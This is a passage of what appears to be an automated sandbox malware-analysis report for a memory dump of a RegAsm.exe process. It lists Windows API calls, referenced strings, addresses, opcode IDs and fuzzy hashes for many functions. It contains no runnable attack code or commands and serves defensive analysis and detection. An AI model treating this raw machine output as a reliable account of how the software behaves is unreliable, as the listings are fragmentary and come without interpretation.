                                                                                                                                              • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                              • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                              • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                              • wcscat.MSVCRT ref: 0041101F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 822687973-0
                                                                                                                                              • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                              • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                              • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                              • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                              APIs
                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                              • malloc.MSVCRT ref: 00417459
                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                                                                                              • free.MSVCRT ref: 0041747F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2605342592-0
                                                                                                                                              • Opcode ID: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                                                                                                                                              • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                              • Opcode Fuzzy Hash: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                                                                                                                                              • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                              • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                              • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2678498856-0
                                                                                                                                              • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                              • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                              • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                              • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                              • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                              • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Item
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3888421826-0
                                                                                                                                              • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                              • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                              • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                              • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00417B7B
                                                                                                                                              • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                              • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                              • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3727323765-0
                                                                                                                                              • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                              • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                              • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                              • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040F673
                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                              • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2754987064-0
                                                                                                                                              • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                              • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                              • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                              • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040F6E2
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                              • strlen.MSVCRT ref: 0040F70D
                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2754987064-0
                                                                                                                                              • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                              • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                              • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                              • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00402FD7
                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                              • strlen.MSVCRT ref: 00403006
                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2754987064-0
                                                                                                                                              • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                              • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                              • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                              • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: wcscpy$CloseHandle
                                                                                                                                              • String ID: General
                                                                                                                                              • API String ID: 3722638380-26480598
                                                                                                                                              • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                              • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                              • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                              • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                              • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 764393265-0
                                                                                                                                              • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                              • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                              • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                              • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                              APIs
                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Time$System$File$LocalSpecific
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 979780441-0
                                                                                                                                              • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                              • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                              • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                              • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                              APIs
                                                                                                                                              • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                              • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                              • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1386444988-0
                                                                                                                                              • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                              • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                              • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                              • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InvalidateMessageRectSend
                                                                                                                                              • String ID: d=E
                                                                                                                                              • API String ID: 909852535-3703654223
                                                                                                                                              • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                              • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                              • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                              • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                              APIs
                                                                                                                                              • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                              • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: wcschr$memcpywcslen
                                                                                                                                              • String ID: "
                                                                                                                                              • API String ID: 1983396471-123907689
                                                                                                                                              • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                              • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                              • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                              • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                              • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                              • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer_memicmpmemcpy
                                                                                                                                              • String ID: URL
                                                                                                                                              • API String ID: 2108176848-3574463123
                                                                                                                                              • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                              • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                              • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                              • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                              APIs
                                                                                                                                              • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _snwprintfmemcpy
                                                                                                                                              • String ID: %2.2X
                                                                                                                                              • API String ID: 2789212964-323797159
                                                                                                                                              • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                              • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                              • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                              • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _snwprintf
                                                                                                                                              • String ID: %%-%d.%ds
                                                                                                                                              • API String ID: 3988819677-2008345750
                                                                                                                                              • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                              • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                              • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                              • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040E770
                                                                                                                                              • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSendmemset
                                                                                                                                              • String ID: F^@
                                                                                                                                              • API String ID: 568519121-3652327722
                                                                                                                                              • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                              • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                              • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                              • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PlacementWindowmemset
                                                                                                                                              • String ID: WinPos
                                                                                                                                              • API String ID: 4036792311-2823255486
                                                                                                                                              • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                              • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                              • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                              • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                              • API String ID: 4271163124-1506664499
                                                                                                                                              • Opcode ID: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                                                                                                                                              • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                              • Opcode Fuzzy Hash: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                                                                                                                                              • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@DeleteObject
                                                                                                                                              • String ID: r!A
                                                                                                                                              • API String ID: 1103273653-628097481
                                                                                                                                              • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                              • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                              • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                              • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                              • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                              • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                              • String ID: _lng.ini
                                                                                                                                              • API String ID: 383090722-1948609170
                                                                                                                                              • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                              • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                              • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                              • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                              APIs
                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
